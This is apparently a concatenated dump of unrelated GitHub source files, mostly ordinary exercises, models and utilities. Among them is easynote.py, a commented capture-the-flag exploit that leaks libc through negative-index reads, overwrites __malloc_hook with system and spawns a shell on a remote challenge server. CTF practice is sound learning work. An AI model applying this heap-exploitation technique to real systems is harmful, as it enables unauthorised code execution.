"chanaka.leadership@gmail.com"
] | chanaka.leadership@gmail.com |
f46477242fa911d6e3c8332e24eb1cc7e38b0750 | 99d436394e47571160340c95d527ecadaae83541 | /algorithms_questions/ch14_sorting/q26_2.py | 1d3dbab643ddebf9f47062db3e7538e2d0eb1102 | [] | no_license | LeeSeok-Jun/Algorithms | b47ba4de5580302e9e2399bcf85d245ebeb1b93d | 0e8573bd03c50df3f89dd0ee9eed9cf8716ef8d8 | refs/heads/main | 2023-03-02T06:47:20.939235 | 2021-02-08T05:18:24 | 2021-02-08T05:18:24 | 299,840,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | """
카드 정렬하기 - 3회차
"""
# 풀이 제한 시간 : 30분
# 2021/01/21 14:57 ~ 15:15
# 실패 - 틀린 부분 주석 처리
import heapq
n = int(input())
data = []
for _ in range(n):
heapq.heappush(data, int(input()))
"""
sum_value = heapq.heappop(data)
while data:
now = heapq.heappop(data)
sum_value += now
heapq.heappush(data, sum_value)
print(sum_value)
"""
result = 0
while len(data) != 1:
one = heapq.heappop(data)
two = heapq.heappop(data)
sum_value = one + two
result += sum_value
heapq.heappush(data, result)
print(result)
| [
"seok9376@gmail.com"
] | seok9376@gmail.com |
e6f0722f81bf18061e524fef27387e979ffb987b | 66fad69779c0cb4cc2caa72686fe41db0f63ff80 | /docs/doxygen/doxyxml/text.py | 96a38c45def36eb824183bdeecd3321ffa21c6d5 | [] | no_license | xiaogaogaoxiao/gr-AnyScatter | c9e4d56febf34673cb205f149ce263df62d0a7ca | c9e71a4efd12a19b0492788593ac5bd7055625cb | refs/heads/master | 2022-04-16T18:01:15.660178 | 2020-04-06T13:45:32 | 2020-04-06T13:45:32 | 275,690,629 | 1 | 1 | null | 2020-06-29T00:08:23 | 2020-06-29T00:08:22 | null | UTF-8 | Python | false | false | 1,947 | py | #
# Copyright 2010 Free Software Foundation, Inc.
#
# This file was generated by gr_modtool, a tool from the GNU Radio framework
# This file is a part of gr-AnyScatter
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
"""
Utilities for extracting text from generated classes.
"""
from __future__ import unicode_literals
def is_string(txt):
if isinstance(txt, str):
return True
try:
if isinstance(txt, str):
return True
except NameError:
pass
return False
def description(obj):
if obj is None:
return None
return description_bit(obj).strip()
def description_bit(obj):
if hasattr(obj, 'content'):
contents = [description_bit(item) for item in obj.content]
result = ''.join(contents)
elif hasattr(obj, 'content_'):
contents = [description_bit(item) for item in obj.content_]
result = ''.join(contents)
elif hasattr(obj, 'value'):
result = description_bit(obj.value)
elif is_string(obj):
return obj
else:
raise Exception('Expecting a string or something with content, content_ or value attribute')
# If this bit is a paragraph then add one some line breaks.
if hasattr(obj, 'name') and obj.name == 'para':
result += "\n\n"
return result
| [
"nonzerosume@gmail.com"
] | nonzerosume@gmail.com |
c8ffef0f996508839e103bcceab71afd3dd3f5fe | db19681c5349e60fd16eafcfef220327f42f8517 | /프로젝트/countLine/arm_m3_kit_server.py | ea007e5fc3c7f0a71ab424f46207d6b903e13d68 | [] | no_license | demetoir/2016-2-microprocessor-project | 1bb19499629b243e5d508e553bcf0ba2d0f926f5 | 2098ff6a574e2c16e2a8aa17cfbc2a8fa31d36ef | refs/heads/master | 2022-04-23T23:25:43.886535 | 2020-04-27T05:26:48 | 2020-04-27T05:26:48 | 74,488,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,902 | py | false = False
true = True
import serial
import time
import sys
import traceback
import datetime
import random
from time import gmtime, strftime
rootPwd = "1234"
class arm_m3_kit_server :
MSG_ENCONDDING_TYPE = "ascii"
MAX_MSG_LEN = 100
connectionMsgList = ["end\n",
"send_handshake",
"receive_handshake",
"connected_confirm",
"send",
"receive",
"disconnect",
"success"]
SLEEP_TIME = 0.1
CHECK_CONNECTION_INTERVAL = 50
HAND_SHAKE_TIME_LIMIT = 20
lockerDB = {}
def setLockerDB(self, lockerDB):
self.lockerDB = lockerDB
def delay(self):
time.sleep(self.SLEEP_TIME)
class SerialConnectionSetting :
port = 'COM5'
baudrate = 115200
parity = 'N'
stopbits = 1
bytesize = 8
timeout = 0
def __init__(self, port='COM5', baudrate=115200, parity='N', stopbits=1, bytesize=8, timeout=0):
self.port = port
self.baudrate = baudrate
self.parity = parity
self.stopbits = stopbits
self.bytesize = bytesize
self.timeout = timeout
return
serialConnectionSetting = SerialConnectionSetting()
serialConnectionObject = None
def connectSerial(self, setting):
try:
self.serialConnectionObject = serial.Serial(port = setting.port,
baudrate = setting.baudrate,
parity = setting.parity,
stopbits = setting.stopbits,
bytesize = setting.bytesize,
timeout = setting.timeout)
except :
print("fail to open serial port")
traceback.print_exc(file = sys.stdout)
return false
print("success to open serial port")
print("serial object : ", self.serialConnectionObject)
print("serial setting : ", self.serialConnectionObject.portstr)
return true
def receiveMsg(self):
return str(self.serialConnectionObject.readline())[2:-1]
def sendMsg(self, msg, showEcho=false):
for c in msg:
bChar = bytes(c, encoding = self.MSG_ENCONDDING_TYPE)
self.serialConnectionObject.write(bChar)
echoChar = ""
while (1):
echoChar = self.receiveMsg()
if (echoChar != ''):
break
if (showEcho):
print("send : %s echo : %s" % (bChar, echoChar))
return
def makeHandShake(self, showLog=false, timeOut=HAND_SHAKE_TIME_LIMIT):
curtime = time.clock
startTime = curtime()
handShakeMsg = "send_handshake end\n"
if showLog :
print("server send : send handshake msg")
self.sendMsg(handShakeMsg)
msg = ""
while 1:
self.delay()
rcvMsg = self.receiveMsg()
if curtime() - startTime > 1:
self.sendMsg(handShakeMsg)
break
msg += rcvMsg
if showLog:
print("server : receive buffer :" + msg)
msgTokenList = msg.split()
if len(msgTokenList) <2 or msgTokenList[-1] != "end\\n":
continue
if msgTokenList[0] == "receive_handshake" and msgTokenList[1] == 'end\\n':
msg = "receive_handshake end\n"
if showLog:
print("server receive : <%s> "%(msg))
return true
return false
def disconnectToArmKit(self, showLog=false) :
curtime = time.clock
starttime = curtime()
dcsMsg = "disconnect end\n"
dcrMsg = "disconnect success end\\n"
self.sendMsg(dcsMsg)
if showLog:
print("server send : ", dcsMsg)
print("server hear : ")
msg = ""
while true:
if curtime() - starttime > 3:
if showLog :
print("server : disconnect time out")
print("server : resend disconnect msg")
self.sendMsg(dcsMsg)
self.delay()
s = self.receiveMsg()
if s == "": continue
msg += s
if showLog:
print("buffer :",msg)
if dcrMsg in msg:
break
if len(msg) > self.MAX_MSG_LEN :
if showLog :
print("server : disconnection error")
print("server : resend disconnect msg")
self.sendMsg(dcsMsg)
return true
def sendSynTimeMsg(self, showLog = false):
isOk = true
if showLog :
print("current time : %s"%(datetime.datetime.now()))
now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
msg = "Syc_time %s end\n"%(now)
self.sendMsg(msg)
if showLog:
print ("server send : %s"%(bytes(msg, encoding = self.MSG_ENCONDDING_TYPE)))
return isOk
def CheckConnection(self, showLog = false):
self.sendMsg("check_connection end\n")
msg = ""
startTime = time.time();
timeLimit = 5
rcvmsg = "check_connection end\\n"
while 1:
if time.time() - startTime > timeLimit:
if showLog:
print("check connection time out")
return false
msg += self.receiveMsg()
if showLog :
print (type(msg), type(rcvmsg))
print(msg == rcvmsg)
print("received :",msg)
print("target :", rcvmsg)
if rcvmsg in msg :
return true
return false
def isPemissionMsg(self, msg, showLog= false):
tokenList = msg.split()
if len(tokenList) <4 :
return false
if tokenList[0] == "request_permission" and tokenList[3] == 'end\\n':
return true
return false
def responsePermissionMsg(self, msg, showLog = false):
tokenList = msg.split()
pwd = tokenList[1]
lockerNum = tokenList[2]
if showLog:
print("server recieved : pwd %s , lockNum : %s"%(pwd,lockNum))
if lockerNum in self.lockerDB and self.lockerDB[lockerNum]["lockerPassword"] == pwd:
self.lockerDB[lockerNum]["lockerPassword"] = "%04d"%(random.randint(0,9999))
result = true
else :
result = false
if result == true:
msg ="reseponse_permission %s end\n"%("yes")
else:
msg ="reseponse_permission %s end\n"%("no")
if showLog:
print("server send : %s"%( msg))
self.sendMsg(msg)
def printTimeLog(self, msg, showLog = true):
if showLog:
print("%s arm server : %s"%( str(datetime.datetime.now()), msg ))
def connectToArmKit(self, showLowg = false):
self.disconnectToArmKit()
self.printTimeLog("disconnection success")
self.printTimeLog("start hand shake")
while(1):
if self.makeHandShake() == true:
break
self.printTimeLog("retry hand shake")
self.printTimeLog("hand shake success")
self.sendSynTimeMsg()
self.printTimeLog("sync Time complete")
return
def main(self, _lockerDB = {}):
self.setLockerDB(_lockerDB)
self.connectSerial(self.serialConnectionSetting)
if self.serialConnectionObject == None:
self.printTimeLog("can not make serial connection")
exit()
self.connectToArmKit()
checkConnectionTime = self.CHECK_CONNECTION_INTERVAL
msg = ""
while true:
self.delay()
checkConnectionTime -= 1
if checkConnectionTime <= 0:
checkConnectionTime = self.CHECK_CONNECTION_INTERVAL
isOk = self.CheckConnection()
if isOk:
self.printTimeLog("check ok")
else :
self.connectToArmKit()
msg += self.receiveMsg()
if msg != "" :
tokenList = msg.split()
if tokenList[-1] != 'end\\n':
continue;
self.printTimeLog("received : %s"%(msg))
if self.isPemissionMsg(msg) != false:
self.responsePermissionMsg(msg)
msg = ""
continue
self.disconnectToArmKit()
# start
if __name__ == "__main__":
arm_m3_kit_server().main()
| [
"wnsqlehlswk@naver.com"
] | wnsqlehlswk@naver.com |
3b3a68e496df3baa70a626c784c1ac7d960d6835 | c6f375f5d237b6472f014a2a47f032897aedc65b | /TRACKER/trackerApp/migrations/0001_initial.py | de6bdaf90a82acc575fbacf8f243b241949f1f0a | [] | no_license | gsblinkhorn/TODO-List-App | a0420b2415f72af2673e91bf13a565be2ee65866 | e6d6f86ab9e809bd3f033f52c34e448fecce91e1 | refs/heads/master | 2021-06-21T13:51:53.200826 | 2019-06-10T21:58:23 | 2019-06-10T21:58:23 | 170,768,029 | 0 | 0 | null | 2021-06-10T21:10:29 | 2019-02-14T22:40:20 | HTML | UTF-8 | Python | false | false | 609 | py | # Generated by Django 2.1.7 on 2019-02-12 22:43
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='List',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
('date', models.DateField(default=None)),
],
),
]
| [
"gsblinkhorn@gmail.com"
] | gsblinkhorn@gmail.com |
f26f5381c735e2b392efb5377724e8ec377a6a3a | 70e7533a4342cd4eff6714693d0838d50a694ec1 | /DSA_level_up_course/Arrays_and_Vectors/mountain.py | 6d1843642ec37336625181080b08079d24c9ddc0 | [] | no_license | au1206/DS-algo_practice | 5e1673e1b1e4b282669b4ad1f3f4aaf3e27a646c | 126fcb339e54768dd162c9a3e6cc04ef7b6184ee | refs/heads/main | 2023-06-03T03:51:41.469942 | 2021-06-28T03:45:36 | 2021-06-28T03:45:36 | 351,354,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | """
Write a function that take in an array of distinct integers, and returns the length of highest mountain.
A mountain is defined as adjacent integers that are strictly increasing until they reach a peak, at which becomes
strictly decreasing. At least 3 numbers are needed to for a mountain
"""
# identify peaks - a[]
# from the peak, move backwards till they decrease, similarly for positive side
# O(2n)
def peaks(arr):
out = []
for i in range(1, len(arr)-1):
count_back, count_front = 0, 0
if arr[i] > arr[i-1] and arr[i] > arr[i+1]:
# found a peak
# count backwards
j = i
while j >= 1 and arr[j] > arr[j-1]:
count_back += 1
j -= 1
# count forward
# we can further optimize by using i directly instead of k as we want the counter to move down from the
# peak in one pass
# k = i
# while k <= len(arr)-1 and arr[k] > arr[k+1]:
# count_front += 1
# k += 1
# out.append((arr[i], count_back, count_front, count_back + count_front+1))
while i <= len(arr)-1 and arr[i] > arr[i+1]:
count_front += 1
i += 1
return out
if __name__ == '__main__':
arr = [5, 6, 1, 2, 3, 4, 5, 4, 3, 2, 0, 1, 2, 3, -2, 4]
print(peaks(arr))
| [
"akshayuppal12@gmail.com"
] | akshayuppal12@gmail.com |
849efcb9ae64e03c1b88eae58cb552402b5621b0 | 1795060a895d91b1cd882c1a847a6f88337071a2 | /writeups/crossctf-quals2018/pwn/easynote/easynote.py | 70c8de31417be0104c3f49863b424dcaa7eb40bb | [] | no_license | nushosilayer8/writeups | 08853ffc78b5823d01209db005da1207f1d0f83a | 3c664ce22ffc942ad3c4d3d818326ca1d95e2a0b | refs/heads/master | 2020-03-18T03:12:45.641423 | 2019-10-03T04:04:00 | 2019-10-03T04:04:00 | 134,228,492 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,224 | py | from pwn import *
context.log_level='debug'
# read and edit in the binary have a vulnerability:
# they can take in negative indexes
# edit also doesnt malloc() if the entry is non-null
# Thus, we can modify the contents of the note after #i
# using edit(#i, -1, 'stuff')
# and also read the contents of a note (including the address
# of the next note) using read(#i, -1)
# The structure of the note is as follows:
# +----------+----------+----------+----------+ ...
# | size | next ptr |entry_ptr0|entry_ptr1| ...
# +----------+----------+----------+----------+ ...
# Entry indexes:
# -2 -1 0 1 ...
libc_path = './easynote_libc-2.26.so'
libc = ELF(libc_path)
if args['R']=='1':
p = remote('ctf.pwn.sg', 1700)
else:
p = process('./easynote', env = {'LD_PRELOAD': os.path.join(os.getcwd(), libc_path)})
def create(sz):
p.sendlineafter('Choice: ', '0')
p.sendlineafter('Entries: ', ' '+str(sz))
def delete(sz):
p.sendlineafter('Choice: ', '1')
p.sendlineafter('Notebook index: ', ' '+str(sz))
def read(nidx, eidx):
p.sendlineafter('Choice: ', '2')
p.sendlineafter('Notebook index: ', ' '+str(nidx))
p.sendlineafter('Entry index: ', ' '+str(eidx))
return p.recvline()
def edit(nidx, eidx, content):
p.sendlineafter('Choice: ', '3')
p.sendlineafter('Notebook index: ', ' '+str(nidx))
p.sendlineafter('Entry index: ', ' '+str(eidx))
p.sendlineafter('Enter contents: ', content)
# If we create a large amount of memory, malloc()
# will call mmap(), and a new region of valid memory
# will be used as a 'extra heap'
# This region of memory is actually RIGHT before libc!
# (0x42200 before libc)
# The idea is to read where libc is, then overwrite function pointers
# such as __malloc_hook or __free_hook to system() so that malloc/free
# becomes system()
# create large amt of memory
# this actually allocats the note at the new extra heap,
# somewhere around the upper half of the new extra heap
# index #0
create(0x210000/8)
# fill up the original heap so that the next create() will
# ask from the extra heap
# index #1
create(16800)
# at -1 of index #0 is the pointer to index #1
# so we overwrite the `size` field of index #1
# to 'a'*8, so that when we read(0, -1), we can
# read 'aaaaaaaa'+(ptr to index #2)
edit(0, -1,'a'*8)
# create index #2
create(0x210000/8)
# now leak the address of index #2
# this is the address of the start of the extra heap + 0x10
leak = u64(read(0, -1)[8:-1].ljust(8,'\x00'))
# libc is a constant (0x422000) from the extra heap
libc_base=leak-0x10+0x422000
# woops hardcoded
__malloc_hook = libc_base + 0x003dac10
system = libc_base + 294336
print(hex(libc_base))
# Now we set index #2's size to 'a'*8 and its 'next ptr' to __malloc_hook
edit(1, -1, 'a'*8 + p64(__malloc_hook))
# Overwrite the function pointer at __malloc_hook with system
# Now when __malloc_hook is called is calls system
edit(2, -1, p64(system))
#success('PID: %s'%p.pid)
pause()
# libc_base+1720096 is the address to /bin/sh
# we are basically calling malloc("/bin/sh")
# which calls __malloc_hook("/bin/sh", some bs ....)
# which is actually system("/bin/sh")
create((libc_base+1720096)/8-2)
p.interactive()
| [
"enigmatrix2000@gmail.com"
] | enigmatrix2000@gmail.com |
84a44293453107c4c6dd00597d3f3f1c970b6484 | de4e8e0f33dbd8bb39784907b420f05b2d62f65a | /test/test_sub_step_type.py | e57e83c7a9007b51213a5ff59a81bf9107ecdcc5 | [
"BSD-3-Clause"
] | permissive | hpcc-systems/uptrends-python | 489d7b513d1eeaf57569081363861010492a85e6 | 2e05ba851a4e65bde3c40514f499c475465bef90 | refs/heads/master | 2022-11-15T05:32:38.638456 | 2020-07-10T18:48:45 | 2020-07-10T18:48:45 | 256,216,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,093 | py | # coding: utf-8
"""
Uptrends API v4
This document describes Uptrends API version 4. This Swagger environment also lets you execute API methods directly. Please note that this is not a sandbox environment: these API methods operate directly on your actual Uptrends account. For more information, please visit https://www.uptrends.com/api. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import uptrends
from uptrends.models.sub_step_type import SubStepType # noqa: E501
from uptrends.rest import ApiException
class TestSubStepType(unittest.TestCase):
"""SubStepType unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSubStepType(self):
"""Test SubStepType"""
# FIXME: construct object with mandatory attributes with example values
# model = uptrends.models.sub_step_type.SubStepType() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"SandCr01@risk.regn.net"
] | SandCr01@risk.regn.net |
808df8fd000d1100b98a1532e9de2156af996c80 | 8ee9a85496208ed5f4331d437ec44cc17f7bce08 | /FinalPractice/SemanticSegmentation/U_net/model.py | 76320a94bd7d5507c70b0f20bc245ce78291b4fc | [] | no_license | Ollitros/ComputerVision | aa93527ef0172874a0034b61d1cae6c31f514734 | b0ec5d9f94406b4f8164d0ef7180226156ea1194 | refs/heads/master | 2020-04-03T19:23:06.898807 | 2019-06-13T04:56:29 | 2019-06-13T04:56:29 | 155,521,472 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | from tensorflow.keras.layers import Conv2D, MaxPool2D, UpSampling2D, \
Input, BatchNormalization, concatenate, Activation
from tensorflow.keras.models import Model
def model():
inputs = Input(shape=(128, 128, 3))
# 128
down1 = Conv2D(64, (3, 3), padding='same')(inputs)
down1 = BatchNormalization()(down1)
down1 = Activation('relu')(down1)
down1 = Conv2D(64, (3, 3), padding='same')(down1)
down1 = BatchNormalization()(down1)
down1 = Activation('relu')(down1)
down1_pool = MaxPool2D()(down1)
# 64
down2 = Conv2D(128, (3, 3), padding='same')(down1_pool)
down2 = BatchNormalization()(down2)
down2 = Activation('relu')(down2)
down2 = Conv2D(128, (3, 3), padding='same')(down2)
down2 = BatchNormalization()(down2)
down2 = Activation('relu')(down2)
down2_pool = MaxPool2D()(down2)
# 32
down3 = Conv2D(256, (3, 3), padding='same')(down2_pool)
down3 = BatchNormalization()(down3)
down3 = Activation('relu')(down3)
down3 = Conv2D(256, (3, 3), padding='same')(down3)
down3 = BatchNormalization()(down3)
down3 = Activation('relu')(down3)
down3_pool = MaxPool2D()(down3)
# 16
down4 = Conv2D(512, (3, 3), padding='same')(down3_pool)
down4 = BatchNormalization()(down4)
down4 = Activation('relu')(down4)
down4 = Conv2D(512, (3, 3), padding='same')(down4)
down4 = BatchNormalization()(down4)
down4 = Activation('relu')(down4)
down4_pool = MaxPool2D()(down4)
# 8
center = Conv2D(1024, (3, 3), padding='same')(down4_pool)
center = BatchNormalization()(center)
center = Activation('relu')(center)
center = Conv2D(1024, (3, 3), padding='same')(center)
center = BatchNormalization()(center)
center = Activation('relu')(center)
# center
up4 = UpSampling2D((2, 2))(center)
up4 = concatenate([down4, up4], axis=3)
up4 = Conv2D(512, (3, 3), padding='same')(up4)
up4 = BatchNormalization()(up4)
up4 = Activation('relu')(up4)
up4 = Conv2D(512, (3, 3), padding='same')(up4)
up4 = BatchNormalization()(up4)
up4 = Activation('relu')(up4)
up4 = Conv2D(512, (3, 3), padding='same')(up4)
up4 = BatchNormalization()(up4)
up4 = Activation('relu')(up4)
# 16
up3 = UpSampling2D((2, 2))(up4)
up3 = concatenate([down3, up3], axis=3)
up3 = Conv2D(256, (3, 3), padding='same')(up3)
up3 = BatchNormalization()(up3)
up3 = Activation('relu')(up3)
up3 = Conv2D(256, (3, 3), padding='same')(up3)
up3 = BatchNormalization()(up3)
up3 = Activation('relu')(up3)
up3 = Conv2D(256, (3, 3), padding='same')(up3)
up3 = BatchNormalization()(up3)
up3 = Activation('relu')(up3)
# 32
up2 = UpSampling2D((2, 2))(up3)
up2 = concatenate([down2, up2], axis=3)
up2 = Conv2D(128, (3, 3), padding='same')(up2)
up2 = BatchNormalization()(up2)
up2 = Activation('relu')(up2)
up2 = Conv2D(128, (3, 3), padding='same')(up2)
up2 = BatchNormalization()(up2)
up2 = Activation('relu')(up2)
up2 = Conv2D(128, (3, 3), padding='same')(up2)
up2 = BatchNormalization()(up2)
up2 = Activation('relu')(up2)
up1 = UpSampling2D((2, 2))(up2)
up1 = concatenate([down1, up1], axis=3)
up1 = Conv2D(64, (3, 3), padding='same')(up1)
up1 = BatchNormalization()(up1)
up1 = Activation('relu')(up1)
up1 = Conv2D(64, (3, 3), padding='same')(up1)
up1 = BatchNormalization()(up1)
up1 = Activation('relu')(up1)
up1 = Conv2D(64, (3, 3), padding='same')(up1)
up1 = BatchNormalization()(up1)
up1 = Activation('relu')(up1)
classify = Conv2D(1, (1, 1), activation='sigmoid')(up1)
model = Model(inputs=inputs, outputs=classify)
return model
| [
"Ollitros@gmail.com"
] | Ollitros@gmail.com |
3190ff79a325639ebf414c7f80900add89bff713 | 080de342ebd4397b62c02765c47c9378f4cc0ef1 | /Project/functions/getting_tables.py | dec231d8fc8817cb8e2726a7c48d63dc49e1bb1e | [] | no_license | timothee-florian/Applied-Data-Analysis-2018 | 3367c1f53deed7eca935e3c47698d11fa0620111 | 433afcc50daf4f82099711a8aee21b750fbdad73 | refs/heads/master | 2020-04-23T09:31:54.481087 | 2019-03-29T12:41:03 | 2019-03-29T12:41:03 | 171,071,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,003 | py | import pandas as pd
import numpy as np
from math import pi
import matplotlib.pyplot as plt
def country_stat_creation(protests_df,country_by_income_2017,countries_stats,country_codes_to_name):
#Getting number of protests per country without any threshold
number_of_protests_per_country = protests_df.groupby(['Country Code']).size().reset_index(name='protests count')
#Extracting the two column we are interesting in
country_by_income_2017_filtered=country_by_income_2017[['Country Code','Income Group']]
#joining tables to get the country, the income group and the protests count in the same table
income_group_and_protests_count=pd.merge(country_by_income_2017_filtered, number_of_protests_per_country, how='right', on=['Country Code'])
countries_stats_with_code=pd.merge(countries_stats, country_codes_to_name, how='left', on='Country Name')
countries_stats_with_code=countries_stats_with_code.dropna()
#Getting a dataframe with all the statistics by country!
countries_all_stats=pd.merge(countries_stats_with_code, income_group_and_protests_count, how='left', left_on='Country Code', right_on='Country Code')
countries_all_stats=countries_all_stats.dropna()
#Using countries that have more than 1 protest for the linear regression
countries_all_stats=countries_all_stats[countries_all_stats['protests count'] > 1]
return countries_all_stats
def load_countrycode(DATA_PATH):
#Getting conversion between fips104 and iso2 code for countries
country_codes_fips104_to_iso = pd.read_csv(DATA_PATH + "fips104_to_iso.csv", encoding = "ISO-8859-1")
#Getting conversion between iso2 and iso3 code for countries
country_codes_iso2_to_iso3 = pd.read_csv(DATA_PATH + "country_codes_iso2_to_iso3.csv", encoding = "ISO-8859-1")
#merging the two data to convert from Fips 104 to ISO3
country_codes_fips104_to_iso3 = pd.merge(country_codes_fips104_to_iso, country_codes_iso2_to_iso3, how='inner',\
left_on=['ISO 3166'], right_on=['ISO'])[['FIPS 10-4', 'ISO3']]
# Getting conversion between country code and country name
country_codes_to_name = pd.read_csv(DATA_PATH + "country_lat_long.csv", encoding = "ISO-8859-1")
country_codes_to_name=country_codes_to_name.rename(index=str, columns={"ISO3": "Country Code"})
country_codes_fips104_to_iso3=country_codes_fips104_to_iso3.rename(index=str, columns={"ISO3": "Country Code"})
return country_codes_to_name, country_codes_fips104_to_iso3
def open_and_clean_data(DATA_PATH):
hdi_df = pd.read_csv(DATA_PATH + "Human_Development_Index_(HDI).csv", encoding = "ISO-8859-1")
hdi_df = hdi_df.drop(hdi_df.iloc[:,2:17], axis = 1)
gini_df = pd.read_csv(DATA_PATH + "GINI_per_country_worldbank.csv", encoding = "ISO-8859-1")
gini_df = gini_df.drop(gini_df.iloc[:,2:49], axis = 1)
gdp_df = pd.read_csv(DATA_PATH + "GDP_growth_world_bank.csv", encoding = "ISO-8859-1")
gdp_df = gdp_df.drop(gdp_df.iloc[:,2:49], axis = 1)
corruption_df = pd.read_csv(DATA_PATH + "DataCorruptionPerceptionIndex2000_2017.csv", encoding = "ISO-8859-1")
corruption_df = corruption_df.drop(corruption_df.iloc[:,1:6], axis = 1)
protests_df_location = pd.read_csv(DATA_PATH + 'protests_location.csv')
protests_df_location=protests_df_location.dropna()
#initilize empty dataframe with corresponding columns
columns_data=['Country','2018', '2017', '2016', '2015', '2014','2013', '2012','2011', '2010', '2009','2008', '2007', '2006', '2005', '2004','2003', '2002']
press_freedom_df = pd.DataFrame(columns = columns_data, index = range(0,200))
filepath = DATA_PATH+'parse.txt'
#press_freedom_df
index = []
values = []
with open(filepath) as fp:
line = fp.readline()
column = 0
cnt = 0
line = fp.readline()
while cnt <= 179: #179 counrty in the file
if(line[0] == ' '): #if we detect the space in front of country name
cnt+=1 # row = row + 1
column = 0
values.append(line.split('\t')[0]) #Only keep the name of the counrty and not the shifted rank
line = fp.readline()
else:
while(line[0] != ' '): #While these are the index correspnding to the country detected above
column += 1
values.append(line.split()[0]) #Only keeps the index and not the ranking
line = fp.readline()
row = pd.Series( (v for v in values) )
values = []
n = 0
for i in range(len(row)):
if(i == 0):
press_freedom_df['Country'].iloc[cnt] = row.iloc[0] #name in country column
else:
if(2019 - i == 2011):
n = 1
press_freedom_df[str(2019-i-n)].iloc[cnt] = row.iloc[i] # index corresponding to year
fp.close()
press_freedom_df = press_freedom_df.drop(0)
press_freedom_df = press_freedom_df.head(179)
"""For press freedom This looks really messy, but in fact, the values under each country name are the indices from 2018 t 2002 and the number in parenthsis is the rank for each year. We create a dataframe with press-freedom indices corresponding to each country and each year.
In the algorithm bellow we parse these data to generate the dataframe
According to wikipeddia, 2011 is missing because the report released in 2012 is titled '2011–2012' and cover both 2011 and 2012 in one column. We will later see what we can do to recover these missing data."""
return press_freedom_df, hdi_df, gini_df, gdp_df,corruption_df,protests_df_location
| [
"noreply@github.com"
] | timothee-florian.noreply@github.com |
ebe1fb9cc23593c64d8d943ed016f532d66998e6 | c8f3732435346cdeb2c81b6b403ceccc8a0f39f9 | /9월/소민/Valid Anagram.py | 9554738efda024312d8b495a0c52b956321d219f | [] | no_license | weejw/NetDB-Algorithm-Study | 6d0e2b5d48bdb4b250da5fd843705c26781debe7 | 85b0b1832d838970318ac4628142c0b914f90233 | refs/heads/master | 2022-12-26T15:15:27.576472 | 2020-10-12T04:29:54 | 2020-10-12T04:29:54 | 291,655,038 | 0 | 2 | null | 2020-09-02T06:11:30 | 2020-08-31T08:13:24 | Python | UTF-8 | Python | false | false | 219 | py | class Solution:
def isAnagram(self, s: str, t: str) -> bool:
if len(s) != len(t):
return False
elif sorted(s) == sorted(t):
return True
else:
return False
| [
"ppsoming@gamil.com"
] | ppsoming@gamil.com |
24a1f766afd91bb14af906157c92b21157847e12 | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /repos/Gather-Deployment-master/tensorflow/24.pyflink/notebooks/udf.py | c5bd455da383c118815ae7e7411968c2b4808d33 | [
"MIT"
] | permissive | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,501 | py | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import abc
import collections
import functools
import inspect
from pyflink.java_gateway import get_gateway
from pyflink.table.types import DataType, _to_java_type
from pyflink.util import utils
__all__ = ['FunctionContext', 'ScalarFunction', 'udf']
class FunctionContext(object):
"""
Used to obtain global runtime information about the context in which the
user-defined function is executed. The information includes the metric group,
and global job parameters, etc.
"""
pass
class UserDefinedFunction(abc.ABC):
"""
Base interface for user-defined function.
"""
def open(self, function_context):
"""
Initialization method for the function. It is called before the actual working methods
and thus suitable for one time setup work.
:param function_context: the context of the function
:type function_context: FunctionContext
"""
pass
def close(self):
"""
Tear-down method for the user code. It is called after the last call to the main
working methods.
"""
pass
def is_deterministic(self):
"""
Returns information about the determinism of the function's results.
It returns true if and only if a call to this function is guaranteed to
always return the same result given the same parameters. true is assumed by default.
If the function is not pure functional like random(), date(), now(),
this method must return false.
:return: the determinism of the function's results.
:rtype: bool
"""
return True
class ScalarFunction(UserDefinedFunction):
"""
Base interface for user-defined scalar function. A user-defined scalar functions maps zero, one,
or multiple scalar values to a new scalar value.
"""
@abc.abstractmethod
def eval(self, *args):
"""
Method which defines the logic of the scalar function.
"""
pass
class DelegatingScalarFunction(ScalarFunction):
"""
Helper scalar function implementation for lambda expression and python function. It's for
internal use only.
"""
def __init__(self, func):
self.func = func
def eval(self, *args):
